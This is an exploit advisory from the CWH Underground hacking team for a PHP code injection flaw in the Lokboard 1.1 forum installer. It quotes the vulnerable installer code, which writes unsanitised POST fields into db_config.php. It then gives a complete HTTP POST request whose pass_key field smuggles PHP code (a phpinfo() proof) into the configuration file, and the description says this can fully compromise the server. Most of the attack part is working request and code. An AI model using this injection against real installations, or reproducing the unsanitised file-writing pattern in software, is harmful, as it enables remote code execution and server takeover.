Lokboard 1.1 PHP Code Injection

`# Exploit Title : Lokboard PHP Code Injection  
# Date : 9 June 2013  
# Exploit Author : CWH Underground  
# Site : www.2600.in.th  
# Vendor Homepage : http://lokboard.net/  
# Software Link : lokboard.net/downloads/lokboard_1_1_0.zip  
# Version : 1.1  
# Tested on : Window and Linux  
  
,--^----------,--------,-----,-------^--,  
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..  
`+---------------------------^----------|  
`\_,-------, _________________________|  
/ XXXXXX /`| /  
/ XXXXXX / `\ /  
/ XXXXXX /\______(  
/ XXXXXX /   
/ XXXXXX /  
(________(   
`------'  
  
####################################  
VULNERABILITY: PHP CODE INJECTION  
####################################  
  
/install/index_4.php (LINE: 21-45)  
  
-----------------------------------------------------------------------------  
LINE 21-45:  
  
$config_file = '<?php  
/*******************  
| lokboard forum software  
| powered by lokboard 1.0  
*******************/  
  
if(!defined("access")){ include("errors/access.html"); exit(); }  
  
/*******************  
| The following settings are related  
| to the MySQL side of the application  
*******************/  
  
$DB_NAME = "' . $_POST["name"] . '"; // Your database name  
$DB_HOST = "' . $_POST["host"] . '"; // Your database host  
$DB_USER = "' . $_POST["user"] . '"; // Your database username  
$DB_PASS = "' . $_POST["pass"] . '"; // Your database password  
  
// Please change the following key to a secure phrase - do not modify after board installation  
$config["password_key"] = "' . $_POST["pass_key"] . '";  
?>  
';  
  
$write_config = fopen("../lokboard/db_config.php", "w");  
fwrite($write_config, $config_file);  
-----------------------------------------------------------------------------  
  
  
#####################################################  
DESCRIPTION  
#####################################################  
  
An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability.  
User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file.  
An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server.  
  
This CMS allow attacker to insert PHP code into config.php with 1234";phpinfo();//  
  
/lokboard/db_config.php  
-----------------------------------------------------------------------------  
$DB_NAME = "lokboard"; // Your database name  
$DB_HOST = "localhost"; // Your database host  
$DB_USER = "root"; // Your database username  
$DB_PASS = "toor"; // Your database password  
  
// Please change the following key to a secure phrase - do not modify after board installation  
$config["password_key"] = "1234";phpinfo();//";  
-----------------------------------------------------------------------------  
  
#####################################################  
EXPLOIT  
#####################################################  
  
  
POST /lokboard/install/index_4.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://localhost/lokboard/install/index_3.php?error=1  
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 90  
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//  
  
################################################################################################################  
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2  
################################################################################################################  
`